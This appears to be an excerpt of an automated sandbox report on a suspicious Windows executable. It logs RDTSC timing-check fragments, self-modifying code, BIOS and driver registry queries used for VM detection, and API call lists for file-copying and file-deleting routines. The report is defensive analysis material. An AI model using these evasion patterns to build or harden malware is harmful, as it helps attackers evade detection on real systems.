              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD75B7 second address: DD75DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F99A1050D6Fh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD76A3 second address: DD76B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72717 second address: D7271C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC6AC second address: DDC6C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99A0E9ACEEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC7F5 second address: DDC7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC7F9 second address: DDC808 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99A0E9ACE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCAE0 second address: DDCAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCAE5 second address: DDCAEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD060 second address: DDD0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99A1050D66h 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F99A1050D66h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F99A1050D70h 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jns 00007F99A1050D66h 0x00000025 jnp 00007F99A1050D66h 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e popad 0x0000002f pushad 0x00000030 jns 00007F99A1050D82h 0x00000036 jno 00007F99A1050D6Ch 0x0000003c jg 00007F99A1050D72h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD0D1 second address: DDD0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD209 second address: DDD20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2BE8 second address: DE2C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F99A0E9ACFCh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C22 second address: DE2C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C29 second address: DE2C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C37 second address: DE2C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F99A1050D66h 0x0000000a jng 00007F99A1050D66h 0x00000010 popad 0x00000011 jp 00007F99A1050D68h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C50 second address: DE2C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C56 second address: DE2C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99A1050D66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C60 second address: DE2C6A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99A0E9ACE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1CF1 second address: DE1CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1CF5 second address: DE1CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE219A second address: DE21A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE256E second address: DE2585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99A0E9ACE6h 0x0000000a je 00007F99A0E9ACE6h 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2585 second address: DE2589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70C43 second address: D70C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E74993 second address: E749B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99A1050D77h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E749B3 second address: E749D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99A0E9ACF7h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E77FCF second address: E77FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C85A second address: E8C85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C85E second address: E8C862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8CDE4 second address: E8CE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 jg 00007F99A0E9ACE8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jnc 00007F99A0E9ACE6h 0x00000016 jng 00007F99A0E9ACE6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8CE05 second address: E8CE26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F99A1050D66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f jnl 00007F99A1050D66h 0x00000015 pop ebx 0x00000016 push edi 0x00000017 jl 00007F99A1050D66h 0x0000001d pop edi 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D15B second address: E8D161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D439 second address: E8D458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99A1050D66h 0x0000000a jmp 00007F99A1050D73h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8D458 second address: E8D462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8D462 second address: E8D48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F99A1050D66h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99A1050D77h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8D48A second address: E8D48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F03D second address: E8F041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F041 second address: E8F047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F047 second address: E8F051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F051 second address: E8F055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F055 second address: E8F05E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F05E second address: E8F080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F99A0E9ACE6h 0x0000000a pop ecx 0x0000000b jnl 00007F99A0E9ACECh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F99A0E9ACECh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F080 second address: E8F084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F084 second address: E8F08E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99A0E9ACECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E91ECD second address: E91ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E931E7 second address: E93201 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F99A0E9ACEAh 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F99A0E9ACEEh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E93201 second address: E9320D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007F99A1050D66h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E96A01 second address: E96A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A02DC second address: 52A031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007F99A1050D6Bh 0x0000000b add eax, 7D098C0Eh 0x00000011 jmp 00007F99A1050D79h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F99A1050D6Ch 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A031F second address: 52A0325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0325 second address: 52A0336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, 0Fh 0x0000000e mov esi, edx 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0336 second address: 52A037E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F99A0E9ACF0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99A0E9ACF7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A03D0 second address: 52A03D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A03D8 second address: 52A0426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A0E9ACF8h 0x00000008 pushfd 0x00000009 jmp 00007F99A0E9ACF2h 0x0000000e jmp 00007F99A0E9ACF5h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0426 second address: 52A0444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A1050D79h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0444 second address: 52A0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A0E9ACF7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB46F8 second address: DB4701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: DA9B64 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: DCD643 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E2F7B4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision graph_0-27153
              Source: C:\Users\user\Desktop\file.exe API coverage: 4.8 %
              Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009C18A0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C3910
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009CE210
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C1250
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C1269
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009BDB99
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_009C2390
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009BDB80
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009C23A9
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009CCBE0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C4B10
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009C4B29
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009CD530
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_009CDD30
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009B16B9
